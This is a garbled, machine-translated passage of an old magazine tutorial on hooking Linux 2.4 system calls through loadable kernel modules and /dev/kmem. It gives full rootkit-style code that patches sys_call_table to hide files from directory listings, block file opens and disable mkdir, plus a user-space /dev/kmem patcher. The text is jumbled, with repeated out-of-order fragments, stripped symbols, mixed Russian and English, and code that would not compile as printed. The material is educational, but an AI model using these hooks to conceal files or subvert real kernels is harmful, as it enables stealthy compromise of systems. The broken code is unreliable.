Put the name of the file to open here:

char * kernel_path;

The name of the file we want to protect:

char hide = "test.txt"

Let's allocate memory and copy the name of the file to be opened there:

kernel_path = (char *) kmalloc (255, GFP_KERNEL);

copy_from_user (kernel_path, pathname, 255);

Compare:

if (strstr (kernel_path, (char *) & hide)! = NULL) (

Free memory and return an error code if names match:

kfree (kernel_path);

return -ENOENT;

else (

If the names do not match, we call the original system call to perform the standard file open procedure:

kfree (kernel_path);

return orig_open (pathname, flag, mode);

int init_module ()

orig_open = sys_call_table;

sys_call_table = own_open;

return 0;

void cleanup_module ()

sys_call_table = orig_open;

Let's save the code in the sys_open_call.c file and create a Makefile to get the object module:

CC = gcc

CFLAGS = -O2 -Wall -fomit-frame-pointer

MODFLAGS = -D__KERNEL__ -DMODULE -I / usr / src / linux / include

sys_open_call.o: sys_open_call.c

$ (CC) -c $ (CFLAGS) $ (MODFLAGS) sys_open_call.c

In the current directory, create a file named test.txt, load the module and enter the cat test.txt command. The system will inform about the absence of a file with this name.

Honestly, this kind of protection is easy to get around. It is enough to rename the file with the mv command and then read its contents.

Hiding a file entry in a directory

Determine which system call is responsible for reading the contents of the directory. To do this, let's write another test fragment that reads the current directory:

/ * Dir.c file * /

#include

int main ()

DIR * d;

struct dirent * dp;

d = opendir (".");

dp = readdir (d);

Return 0;

Let's get the executable module:

gcc -o dir dir.c

and trace it:

strace ./dir

Let's pay attention to the penultimate line:

getdents (6, / * 4 entries * /, 3933) = 72;

The contents of the directory are read by the getdents function. The result is stored as a list of structures of type struct dirent. The second parameter to this function is a pointer to this list. The function returns the length of all entries in the directory. In our example, the getdents function determined the presence of four entries in the current directory - ".", ".." and our two files, the executable module and the source code. All directory entries are 72 bytes long. The information about each record is stored, as we said, in the struct dirent structure. We are interested in two fields of this structure:

d_reclen- the size of the record;
d_name- File name.

In order to hide a file record (in other words, make it invisible), you need to intercept the sys_getdents system call, find the corresponding record in the list of received structures, and delete it. Consider the code that performs this operation (the author of the original code is Michal Zalewski):

extern void * sys_call_table;

int (* orig_getdents) (u_int, struct dirent *, u_int);

Let's define our system call.

int own_getdents (u_int fd, struct dirent * dirp, u_int count)

unsigned int tmp, n;

int t;

The assignment of variables will be shown below. Additionally, we need structures:

struct dirent * dirp2, * dirp3;

The name of the file we want to hide:

char hide = "our.file";

Let's determine the length of the entries in the directory:

tmp = (* orig_getdents) (fd, dirp, count);

if (tmp> 0) (

Allocate memory for the structure in kernel space and copy the contents of the directory into it:

dirp2 = (struct dirent *) kmalloc (tmp, GFP_KERNEL);

copy_from_user (dirp2, dirp, tmp);

Let's use the second structure and store the length of the entries in the directory:

dirp3 = dirp2;

t = tmp;

Let's start looking for our file:

while (t> 0) (

We read the length of the first record and determine the remaining length of the records in the directory:

n = dirp3-> d_reclen;

t- = n;

We check if the file name from the current record does not match the searched one:

if (strstr ((char *) & (dirp3-> d_name), (char *) & hide)! = NULL) (

If so, overwrite the entry and calculate the new value for the length of the entries in the directory:

memcpy (dirp3, (char *) dirp3 + dirp3-> d_reclen, t);

tmp- = n;

We position the pointer to the next record and continue searching:

dirp3 = (struct dirent *) ((char *) dirp3 + dirp3-> d_reclen);

We return the result and free the memory:

copy_to_user (dirp, dirp2, tmp);

kfree (dirp2);

Returning the length of the entries in the directory:

return tmp;

The module initialization and unloading functions have a standard form:

int init_module (void)

orig_getdents = sys_call_table;

sys_call_table = own_getdents;

return 0;

void cleanup_module ()

sys_call_table = orig_getdents;

Let's save the source in the sys_call_getd.c file and create a Makefile with the following content:

CC = gcc

module = sys_call_getd.o

CFLAGS = -O3 -Wall

LINUX = / usr / src / linux

MODFLAGS = -D__KERNEL__ -DMODULE -I $ (LINUX) / include

sys_call_getd.o: sys_call_getd.c $ (CC) -c

$ (CFLAGS) $ (MODFLAGS) sys_call_getd.c

Create our.file in the current directory and load the module. The file disappears, as required.

As you understand, it is not possible to consider an example of intercepting each system call within the framework of one article. Therefore, for those who are interested in this issue, I recommend visiting the sites:

There you can find more complex and interesting examples of intercepting system calls. Write about all your comments and suggestions on the magazine's forum.

In preparing the article, materials from the site were used

This material is a modification of the article of the same name by Vladimir Meshkov, published in the journal "System Administrator"

This material is a copy of Vladimir Meshkov's articles from the "System Administrator" magazine. These articles can be found at the links below. Some examples of source codes of programs have also been changed - improved, refined. (Example 4.2 was heavily modified, since I had to intercept a slightly different system call) URLs: http://www.samag.ru/img/uploaded/p.pdf http://www.samag.ru/img/uploaded/a3. pdf

Have questions? Then you are here: [email protected]

2. Loadable kernel module
4. Examples of intercepting system calls based on LKM
- 4.1 Preventing the creation of directories

1. General view of Linux architecture

The most general look allows you to see a two-tier model of the system. kernel<=>progs In the center (left) is the core of the system. The kernel interacts directly with the hardware of the computer, isolating application programs from architectural features. The kernel has a set of services provided to application programs. Kernel services include input / output operations (opening, reading, writing, and file management), the creation and management of processes, their synchronization and interprocess communication. All applications request kernel services through system calls.

The second level is made up of applications or tasks, both system ones, which determine the functionality of the system, and applications, which provide the Linux user interface. However, despite the external heterogeneity of applications, the schemes of interaction with the kernel are the same.

Interaction with the kernel takes place through the standard system call interface. The syscall interface is a collection of kernel services and defines the format of service requests. A process requests a service through a system call to a specific kernel procedure, similar in appearance to a normal library function call. The kernel, on behalf of the process, executes the request and returns the necessary data to the process.

In this example, the program opens a file, reads data from it, and closes the file. In this case, the operation of opening (open), reading (read) and closing (close) of the file is performed by the kernel at the request of the task, and the function open (2), read (2) and close (2) are system calls.

/ * Source 1.0 * / #include main () (int fd; char buf; / * Open the file - get the link (file descriptor) fd * / fd = open ("file1", O_RDONLY); / * Read 80 characters into the buf buffer * / read (fd, buf , sizeof (buf)); / * Close the file * / close (fd);) / * EOF * / A complete list of OS Linux system calls can be found in the /usr/include/asm/unistd.h file. Let's now look at the mechanism for making system calls on this example... The compiler, having met the open () function to open the file, converts it into assembly code, ensuring that the system call number corresponding to this function and its parameters are loaded into the processor registers and the subsequent call to interrupt 0x80. The following values are loaded into processor registers:

into the EAX register - the system call number. So, for our case, the system call number is 5 (see __NR_open).
into EBX register - the first parameter of the function (for open () it is a pointer to a string containing the name of the file being opened.
to ECX register - second parameter (file permissions)

The third parameter is loaded into the EDX register, in this case we do not have it. To execute a system call in OS Linux, the system_call function is used, which is defined (depending on the architecture in this case, i386) in the /usr/src/linux/arch/i386/kernel/entry.S file. This function is the entry point for all system calls. The kernel responds to interrupt 0x80 by calling the system_call function, which is, in fact, a handler for interrupt 0x80.

To make sure we're on the right track, let's look at the open () function code in the system libc:

# gdb -q /lib/libc.so.6 (gdb) disas open Dump of assembler code for function open: 0x000c8080 : call 0x1082be< __i686.get_pc_thunk.cx >0x000c8085 : add $ 0x6423b,% ecx 0x000c808b : cmpl $ 0x0,0x1a84 (% ecx) 0x000c8092 : jne 0xc80b1 0x000c8094 : push% ebx 0x000c8095 : mov 0x10 (% esp, 1),% edx 0x000c8099 : mov 0xc (% esp, 1),% ecx 0x000c809d : mov 0x8 (% esp, 1),% ebx 0x000c80a1 : mov $ 0x5,% eax 0x000c80a6 : int $ 0x80 ... As it is not difficult to see in the last lines, parameters are transferred to the registers EDX, ECX, EBX, and the system call number is put in the last register EAX, equal to 5 as we already know.

Now let's get back to looking at the system calls mechanism. So, the kernel calls the 0x80 interrupt handler - the system_call function. System_call puts copies of the registers containing the call parameters on the stack using the SAVE_ALL macro and calls the required system function with the call command. The table of pointers to kernel functions that implement system calls is located in the sys_call_table array (see file arch / i386 / kernel / entry.S). The system call number, which is in the EAX register, is an index in this array. Thus, if EAX is 5, the sys_open () kernel function will be called. Why is the SAVE_ALL macro needed? The explanation is very simple. Since almost all system kernel functions are written in C, they look for their parameters in the stack. And the parameters are pushed onto the stack using SAVE_ALL! The value returned by the system call is stored in the EAX register.

Now let's figure out how to intercept the system call. The mechanism of loadable kernel modules will help us with this.

2. Loadable kernel module

Loadable Kernel Module (commonly abbreviated as LKM - Loadable Kernel Module) is program code that runs in kernel space. The main feature of LKM is the ability to dynamically load and unload without having to reboot the entire system or recompile the kernel.

Each LKM consists of two main functions (minimum):

module initialization function. Called when the LKM is loaded into memory: int init_module (void) (...)
unload module function: void cleanup_module (void) (...)

Here is an example of the simplest module: / * Source 2.0 * / #include int init_module (void) (printk ("Hello World \ n"); return 0;) void cleanup_module (void) (printk ("Bye \ n");) / * EOF * / Compile and load the module. The module is loaded into memory with the insmod command, and the loaded modules are viewed with the lsmod command: # gcc -c -DMODULE -I / usr / src / linux / include / src-2.0.c # insmod src-2.0.o Warning: loading src-2.0 .o will taint the kernel: no license Module src-2.0 loaded, with warnings # dmesg | tail -n 1 Hello World # lsmod | grep src src-2.0 336 0 (unused) # rmmod src-2.0 # dmesg | tail -n 1 Bye

3. Algorithm for intercepting a system call based on LKM

To implement a module that intercepts a system call, it is necessary to define an interception algorithm. The algorithm is as follows:

keep a pointer to the original (original) call so that it can be restored
create a function that implements the new system call
replace calls in the sys_call_table system calls table, i.e. set the corresponding pointer to a new system call
at the end of the work (when unloading the module) restore the original system call using the previously saved pointer

Tracing allows you to find out which system calls are involved in the operation of the user's application. By tracing it, you can determine which system call should be intercepted to take control of the application. # ltrace -S ./src-1.0 ... open ("file1", 0, 01 SYS_open ("file1", 0, 01) = 3<... open resumed>) = 3 read (3, SYS_read (3, "123 \ n", 80) = 4<... read resumed>"123 \ n", 80) = 4 close (3 SYS_close (3) = 0<... close resumed>) = 0 ... Now we have enough information to start studying examples of implementing modules that intercept system calls.

4. Examples of intercepting system calls based on LKM

4.1 Preventing the creation of directories

When the directory is created, the sys_mkdir kernel function is called. A string containing the name of the created directory is specified as a parameter. Consider the code that intercepts the corresponding system call. / * Source 4.1 * / #include #include #include / * Export the system call table * / extern void * sys_call_table; / * Define a pointer to save the original call * / int (* orig_mkdir) (const char * path); / * Let's create our own system call. Our call does nothing, it just returns a zero value * / int own_mkdir (const char * path) (return 0;) / * During module initialization, we save the pointer to the original call and replace the system call * / int init_module (void) (orig_mkdir = sys_call_table; sys_call_table = own_mkdir; printk ("sys_mkdir replaced \ n"); return (0);) / * When unloading, restore the original call * / void cleanup_module (void) (sys_call_table = orig_mkdir; printk ("sys_mkdir moved_ nmkdir ");) / * EOF * / To get the object module, run the following command and perform some experiments on the system: # gcc -c -DMODULE -I / usr / src / linux / include / src-3.1.c # dmesg | tail -n 1 sys_mkdir replaced # mkdir test # ls -ald test ls: test: No such file or directory # rmmod src-3.1 # dmesg | tail -n 1 sys_mkdir moved back # mkdir test # ls -ald test drwxr-xr-x 2 root root 4096 2003-12-23 03:46 test As you can see, the "mkdir" command doesn't work, or rather nothing happens. To restore the system's functionality, it is enough to unload the module. This is what was done above.

4.2 Hiding a file entry in a directory

Determine which system call is responsible for reading the contents of the directory. To do this, we will write another test fragment that reads the current directory: / * Source 4.2.1 * / #include #include int main () (DIR * d; struct dirent * dp; d = opendir ("."); dp = readdir (d); return 0;) / * EOF * / Get the executable and trace it: # gcc -o src-3.2.1 src-3.2.1.c # ltrace -S ./src-3.2.1 ... opendir ("." SYS_open (".", 100352, 010005141300) = 3 SYS_fstat64 (3, 0xbffff79c, 0x4014c2c0, 3, 0xbffff874) = 0 SYS_fcntl64 (3, 2, 1, 1, 0x4014c2c0) = 0 SYS6a5_brk (SYS_fcntl64 (3, 2, 1, 1, 0x4014c2c0) = 0 SYS6a_brk (NULL_SY_805_brk (N) = 0x0806a5f4 SYS_brk (NULL) = 0x0806a5f4 SYS_brk (0x0806b000) = 0x0806b000<... opendir resumed>) = 0x08049648 readdir (0x08049648 SYS_getdents64 (3.0x08049678, 4096, 0x40014400, 0x4014c2c0) = 528<... readdir resumed>) = 0x08049678 ... Pay attention to the last line. The contents of the directory are read by the getdents64 function (getdents is possible in other kernels). The result is stored as a list of structures of type struct dirent, and the function itself returns the length of all entries in the directory. We are interested in two fields of this structure:

d_reclen - record size
d_name - file name

In order to hide the file record about the file (in other words, make it invisible), it is necessary to intercept the sys_getdents64 system call, find the corresponding record in the list of received structures and delete it. Consider the code that performs this operation (the author of the original code is Michal Zalewski): / * Source 4.2.2 * / #include #include #include #include #include #include #include #include extern void * sys_call_table; int (* orig_getdents) (u_int fd, struct dirent * dirp, u_int count); / * Define our own system call * / int own_getdents (u_int fd, struct dirent * dirp, u_int count) (unsigned int tmp, n; int t; struct dirent64 (int d_ino1, d_ino2; int d_off1, d_off2; unsigned short d_reclen; unsigned char d_type; char d_name;) * dirp2, * dirp3; / * The name of the file we want to hide * / char hide = "file1"; / * Determine the length of the entries in the directory * / tmp = (* orig_getdents) (fd, dirp , count); if (tmp> 0) (/ * Allocate memory for the structure in kernel space and copy the contents of the directory into it * / dirp2 = (struct dirent64 *) kmalloc (tmp, GFP_KERNEL); copy_from_user (dirp2, dirp, tmp) ; / * Let's use the second structure and save the length of the records in the directory * / dirp3 = dirp2; t = tmp; / * Let's start looking for our file * / while (t> 0) (/ * Read the length of the first record and determine the remaining length of the records in directory * / n = dirp3-> d_reclen; t - = n; / * Check if the file name from the current record matches the searched one * / if (strstr ((char *) & (dirp3-> d_name), (char *) & hide)! = NULL) (/ * If so, overwrite the entry and calculate the new length of the entries in the directory * / memcpy (dirp3, (char *) dirp3 + dirp3-> d_reclen, t); tmp - = n; ) / * Position the pointer to the next record and continue searching * / dirp3 = (struct dirent64 *) ((char *) dirp3 + dirp3-> d_reclen); ) / * Return the result and free the memory * / copy_to_user (dirp, dirp2, tmp); kfree (dirp2); ) / * Return the length of the entries in the directory * / return tmp; ) / * The module initialization and unloading functions have a standard form * / int init_module (void) (orig_getdents = sys_call_table; sys_call_table = own_getdents; return 0;) void cleanup_module () (sys_call_table = orig_getdents;) / * EOF * / Having compiled this code, notice how "file1" disappears, as required.

5. Method of direct access to the kernel address space / dev / kmem

Let us first consider theoretically how the interception is carried out by the method of direct access to the kernel address space, and then we will proceed to practical implementation.

Direct access to the kernel address space is provided by the device file / dev / kmem. This file displays all available virtual address space, including the swap partition (swap area). To work with the kmem file, the standard system functions are used - open (), read (), write (). Having opened / dev / kmem in the standard way, we can refer to any address in the system, specifying it as an offset in this file. This method was developed by Silvio Cesare.

System functions are accessed by loading function parameters into processor registers and then calling software interrupt 0x80. The interrupt handler, the system_call function, pushes the call parameters onto the stack, retrieves the address of the called system function from the sys_call_table, and transfers control to this address.

With full access to the kernel address space, we can get the entire contents of the system call table, i.e. addresses of all system functions. By changing the address of any system call, we thereby intercept it. But for this you need to know the address of the table, or, in other words, the offset in the file / dev / kmem where this table is located.

To determine the address of the sys_call_table, you must first calculate the address of the system_call function. Since this function is an interrupt handler, let's look at how interrupts are handled in protected mode.

In real mode, the processor, when registering an interrupt, refers to the interrupt vector table, which is always at the very beginning of the memory and contains two-conditional addresses of interrupt processing programs. In protected mode, an analogue of the interrupt vector table is the Interrupt Descriptor Table (IDT) located in operating system protected mode. In order for the processor to access this table, its address must be loaded into the IDTR (Interrupt Descriptor Table Register) register. The IDT contains descriptors for interrupt handlers, which, in particular, include their addresses. These descriptors are called gateways (gates). The processor, having registered an interrupt, by its number extracts the gateway from the IDT, determines the address of the handler and transfers control to it.

To calculate the address of the system_call function from the IDT table, it is necessary to extract the interrupt gateway int $ 0x80, and from it - the address of the corresponding handler, i.e. system_call function address. In the system_call function, access to the system_call_table is performed by the call command<адрес_таблицы>(,% eax, 4). Having found the opcode (signature) of this command in the / dev / kmem file, we will also find the address of the system call table.

To determine the opcode, we will use the debugger and disassemble the system_call function:

# gdb -q / usr / src / linux / vmlinux (gdb) disas system_call Dump of assembler code for function system_call: 0xc0194cbc : push% eax 0xc0194cbd : cld 0xc0194cbe : push% es 0xc0194cbf : push% ds 0xc0194cc0 : push% eax 0xc0194cc1 : push% ebp 0xc0194cc2 : push% edi 0xc0194cc3 : push% esi 0xc0194cc4 : push% edx 0xc0194cc5 : push% ecx 0xc0194cc6 : push% ebx 0xc0194cc7 : mov $ 0x18,% edx 0xc0194ccc : mov% edx,% ds 0xc0194cce : mov% edx,% es 0xc0194cd0 : mov $ 0xffffe000,% ebx 0xc0194cd5 : and% esp,% ebx 0xc0194cd7 : testb $ 0x2,0x18 (% ebx) 0xc0194cdb : jne 0xc0194d3c 0xc0194cdd : cmp $ 0x10e,% eax 0xc0194ce2 : jae 0xc0194d69 0xc0194ce8 : call * 0xc02cbb0c (,% eax, 4) 0xc0194cef : mov% eax, 0x18 (% esp, 1) 0xc0194cf3 : nop End of assembler dump. The line "call * 0xc02cbb0c (,% eax, 4)" is the call to the sys_call_table table. The value 0xc02cbb0c is the address of the table (most likely your numbers will be different). We get the opcode of this command: (gdb) x / xw system_call + 44 0xc0194ce8 : 0x0c8514ff We found the opcode for the command to access the sys_call_table table. It is \ xff \ x14 \ x85. The next 4 bytes are the address of the table. You can verify this by entering the command: (gdb) x / xw system_call + 44 + 3 0xc0194ceb : 0xc02cbb0c Thus, finding the sequence \ xff \ x14 \ x85 in the file / dev / kmem and reading the following 4 bytes, we get the address of the sys_call_table system call table. Knowing its address, we can get the contents of this table (addresses of all system functions) and change the address of any system call by intercepting it.

Consider the pseudocode that performs the interception operation:

Readaddr (old_syscall, scr + SYS_CALL * 4, 4); writeaddr (new_syscall, scr + SYS_CALL * 4, 4); The readaddr function reads the system call address from the system call table and stores it in the old_syscall variable. Each entry in the sys_call_table is 4 bytes long. The desired address is located at offset sct + SYS_CALL * 4 in the / dev / kmem file (here sct is the address of the sys_call_table table, SYS_CALL is the sequence number of the system call). The writeaddr function overwrites the address of the SYS_CALL system call with the address of the new_syscall function, and all calls to the SYS_CALL system call will be serviced by this function.

It seems that everything is simple and the goal has been achieved. However, let's remember that we are working in the user's address space. If we place a new system function in this address space, then when we call this function we will get a nice error message. Hence the conclusion - a new system call must be placed in the kernel address space. To do this, you need to: get a block of memory in kernel space, place a new system call in this block.

You can allocate memory in kernel space using the kmalloc function. But you cannot call a kernel function directly from the user's address space, so we will use the following algorithm:

knowing the address of the sys_call_table table, we get the address of some system call (for example, sys_mkdir)
define a function that calls the kmalloc function. This function returns a pointer to a block of memory in the kernel address space. Let's call this function get_kmalloc
save the first N bytes of the sys_mkdir system call, where N is the size of the get_kmalloc function
overwrite the first N bytes of the sys_mkdir call with the get_kmalloc function
we make a call to the sys_mkdir system call, thereby starting the get_kmalloc function for execution
restore the first N bytes of the sys_mkdir system call

As a result, we have at our disposal a block of memory located in kernel space.

But to implement this algorithm, we need the address of the kmalloc function. There are several ways to find it. The easiest is to read this address from the System.map file or determine it using the gdb debugger (print & kmalloc). If modules are enabled in the kernel, the kmalloc address can be determined using the get_kernel_syms () function. This option will be discussed below. If there is no support for kernel modules, then the address of the kmalloc function will have to be searched for by the opcode of the kmalloc call command - similar to how it was done for the sys_call_table table.

The kmalloc function takes two parameters: the size of the requested memory and the GFP specifier. To find the opcode, we will use the debugger and disassemble any kernel function that contains a call to the kmalloc function.

# gdb -q / usr / src / linux / vmlinux (gdb) disas inter_module_register Dump of assembler code for function inter_module_register: 0xc01a57b4 : push% ebp 0xc01a57b5 : push% edi 0xc01a57b6 : push% esi 0xc01a57b7 : push% ebx 0xc01a57b8 : sub $ 0x10,% esp 0xc01a57bb : mov 0x24 (% esp, 1),% ebx 0xc01a57bf : mov 0x28 (% esp, 1),% esi 0xc01a57c3 : mov 0x2c (% esp, 1),% ebp 0xc01a57c7 : movl $ 0x1f0,0x4 (% esp, 1) 0xc01a57cf : movl $ 0x14, (% esp, 1) 0xc01a57d6 : call 0xc01bea2a ... It doesn't matter what the function does, the main thing in it is what we need - a call to the kmalloc function. Pay attention to the last line. First, the parameters are loaded onto the stack (the esp register points to the top of the stack), and then the function call follows. GFP specifier ($ 0x1f0,0x4 (% esp, 1) is loaded into the stack first. For kernel versions 2.4.9 and higher this value is 0x1f0. Find the opcode of this command: (gdb) x / xw inter_module_register + 19 0xc01a57c7 : 0x042444c7 If we find this opcode, we can calculate the address of the kmalloc function. At first glance, the address of this function is an argument to the call instruction, but this is not entirely true. Unlike the system_call function, here behind the instruction is not the kmalloc address, but the offset to it relative to the current address. We will verify this by defining the opcode of the call 0xc01bea2a command: (gdb) x / xw inter_module_register + 34 0xc01a57d6 : 0x01924fe8 The first byte is e8, which is the opcode of the call instruction. Let's find the value of the argument of this command: (gdb) x / xw inter_module_register + 35 0xc01a57d7 : 0x0001924f Now if we add the current address 0xc01a57d6, offset 0x0001924f and 5 bytes of the command, we get the required address of the kmalloc function - 0xc01bea2a.

This concludes the theoretical calculations and, using the above technique, we will intercept the sys_mkdir system call.

6. An example of interception by means of / dev / kmem

/ * source 6.0 * / #include #include #include #include #include #include #include #include / * System call number to intercept * / #define _SYS_MKDIR_ 39 #define KMEM_FILE "/ dev / kmem" #define MAX_SYMS 4096 / * IDTR register format description * / struct (unsigned short limit; unsigned int base;) __attribute__ ((packed) ) idtr; / * Description of the format of the IDT interrupt gateway * / struct (unsigned short off1; unsigned short sel; unsigned char none, flags; unsigned short off2;) __attribute__ ((packed)) idt; / * Description of the structure for the get_kmalloc function * / struct kma_struc (ulong (* kmalloc) (uint, int); // - address of the kmalloc function int size; // - memory size for allocation int flags; // - flag, for cores> 2.4.9 = 0x1f0 (GFP) ulong mem;) __attribute__ ((packed)) kmalloc; / * A function that only allocates a block of memory in the kernel address space * / int get_kmalloc (struct kma_struc * k) (k-> mem = k-> kmalloc (k-> size, k-> flags); return 0;) / * A function that returns the address of the function (needed to find kmalloc) * / ulong get_sym (char * n) (struct kernel_sym tab; int numsyms; int i; numsyms = get_kernel_syms (NULL); if (numsyms> MAX_SYMS || numsyms< 0) return 0; get_kernel_syms(tab); for (i = 0; i < numsyms; i++) { if (!strncmp(n, tab[i].name, strlen(n))) return tab[i].value; } return 0; } /* Наша новая системная функция, ничего не делает;) */ int new_mkdir(const char *path) { return 0; } /* Читает из /dev/kmem с offset size данных в buf */ static inline int rkm(int fd, uint offset, void *buf, uint size) { if (lseek(fd, offset, 0) != offset){ printf("lseek err\n"); return 0; } if (read(fd, buf, size) != size) return 0; return size; } /* Аналогично, но только пишет в /dev/kmem */ static inline int wkm(int fd, uint offset, void *buf, uint size) { if (lseek(fd, offset, 0) != offset) return 0; if (write(fd, buf, size) != size) return 0; return size; } /* Читает из /dev/kmem данные размером 4 байта */ static inline int rkml(int fd, uint offset, ulong *buf) { return rkm(fd, offset, buf, sizeof(ulong)); } /* Аналогично, но только пишет */ static inline int wkml(int fd, uint offset, ulong buf) { return wkm(fd, offset, &buf, sizeof(ulong)); } /* Функция для получения адреса sys_call_table */ ulong get_sct(int kmem) { ulong sys_call_off; // - адрес обработчика // прерывания int $0x80 (функция system_call) char *p; char sc_asm; asm("sidt %0" : "=m" (idtr)); if (!rkm(kmem, idtr.base+(8*0x80), &idt, sizeof(idt))) return 0; sys_call_off = (idt.off2 << 16) | idt.off1; if (!rkm(kmem, sys_call_off, &sc_asm, 128)) return 0; p = (char *)memmem(sc_asm, 128, "\xff\x14\x85", 3) + 3; printf("call for sys_call_table at %08x\n",p); if (p) return *(ulong *)p; return 0; } /* Функция для определения адреса функции kmalloc */ ulong get_kma(ulong pgoff) { uint i; unsigned char buf, *p, *p1; int kmemz; ulong ret; ret = get_sym("kmalloc"); if (ret) { printf("\nZer gut!\n"); return ret; } kmemz = open("/dev/kmem", O_RDONLY); if (kmemz < 0) return 0; for (i = pgoff+0x100000; i < (pgoff + 0x1000000); i += 0x10000){ if (!rkm(kmemz, i, buf, sizeof(buf))) return 0; p1=(char *)memmem(buf,sizeof(buf),"\x68\xf0\x01\x00",4); if(p1) { p=(char *)memmem(p1+4,sizeof(buf),"\xe8",1)+1; if (p) { close(kmemz); return *(unsigned long *)p+i+(p-buf)+4; } } } close(kmemz); return 0; } int main() { int kmem; // !! - пустые, нужно подставить ulong get_kmalloc_size; // - размер функции get_kmalloc !! ulong get_kmalloc_addr; // - адрес функции get_kmalloc !! ulong new_mkdir_size; // - размер функции-перехватчика!! ulong new_mkdir_addr; // - адрес функции-перехватчика!! ulong sys_mkdir_addr; // - адрес системного вызова sys_mkdir ulong page_offset; // - нижняя граница адресного // пространства ядра ulong sct; // - адрес таблицы sys_call_table ulong kma; // - адрес функции kmalloc unsigned char tmp; kmem = open(KMEM_FILE, O_RDWR, 0); if (kmem < 0) return 0; sct = get_sct(kmem); page_offset = sct & 0xF0000000; kma = get_kma(page_offset); printf("OK\n" "page_offset\t\t:\t0x%08x\n" "sys_call_table\t:\t0x%08x\n" "kmalloc()\t\t:\t0x%08x\n", page_offset,sct,kma); /* Найдем адрес sys_mkdir */ if (!rkml(kmem, sct+(_SYS_MKDIR_*4), &sys_mkdir_addr)) { printf("Cannot get addr of %d syscall\n", _SYS_MKDIR_); perror("er: "); return 1; } /* Сохраним первые N байт вызова sys_mkdir */ if (!rkm(kmem, sys_mkdir_addr, tmp, get_kmalloc_size)) { printf("Cannot save old %d syscall!\n", _SYS_MKDIR_); return 1; } /* Перепишем первые N байт, функцией get_kmalloc */ if (!wkm(kmem, sys_mkdir_addr,(void *)get_kmalloc_addr, get_kmalloc_size)) { printf("Can"t overwrite our syscall %d!\n",_SYS_MKDIR_); return 1; } kmalloc.kmalloc = (void *) kma; //- адрес функции kmalloc kmalloc.size = new_mkdir_size; //- размер запращевоемой // памяти (размер функции-перехватчика new_mkdir) kmalloc.flags = 0x1f0; //- спецификатор GFP /* Выполним сис. вызов sys_mkdir, тем самым выполним нашу функцию get_kmalloc */ mkdir((char *)&kmalloc,0); /* Востановим оригинальный вызов sys_mkdir */ if (!wkm(kmem, sys_mkdir_addr, tmp, get_kmalloc_size)) { printf("Can"t restore syscall %d !\n",_SYS_MKDIR_); return 1; } if (kmalloc.mem < page_offset) { printf("Allocated memory is too low (%08x < %08x)\n", kmalloc.mem, page_offset); return 1; } /* Оторбразим результаты */ printf("sys_mkdir_addr\t\t:\t0x%08x\n" "get_kmalloc_size\t:\t0x%08x (%d bytes)\n\n" "our kmem region\t\t:\t0x%08x\n" "size of our kmem\t:\t0x%08x (%d bytes)\n\n", sys_mkdir_addr, get_kmalloc_size, get_kmalloc_size, kmalloc.mem, kmalloc.size, kmalloc.size); /* Разместим в пространстве ядра наш новый сис. вызво */ if(!wkm(kmem, kmalloc.mem, (void *)new_mkdir_addr, new_mkdir_size)) { printf("Unable to locate new system call !\n"); return 1; } /* Перепишем таблицу sys_call_table на наш новый вызов */ if(!wkml(kmem, sct+(_SYS_MKDIR_*4), kmalloc.mem)) { printf("Eh ..."); return 1; } return 1; } /* EOF */ Скомпилируем полученый код и определим адреса и размеры функций get_kmalloc и new_mkdir. Запускать полученое творение рано! Для вычисления адресов и размеров воспользуемся утилитой objdump: # gcc -o src-6.0 src-6.0.c # objdump -x ./src-6.0 >dump Let's open the dump file and find the data we are interested in: 080485a4 g F .text 00000032 get_kmalloc 080486b1 g F .text 0000000a new_mkdir Now we will enter these values into our program: ulong get_kmalloc_size = 0x32; ulong get_kmalloc_addr = 0x080485a4; ulong new_mkdir_size = 0x0a; ulong new_mkdir_addr = 0x080486b1; Now let's recompile the program. By launching it for execution, we will intercept the sys_mkdir system call. All calls to the sys_mkdir call will now be serviced by the new_mkdir function.

End Of Paper / EOP

The performance of the code from all sections was tested on the 2.4.22 kernel. When preparing the report, materials from the site were used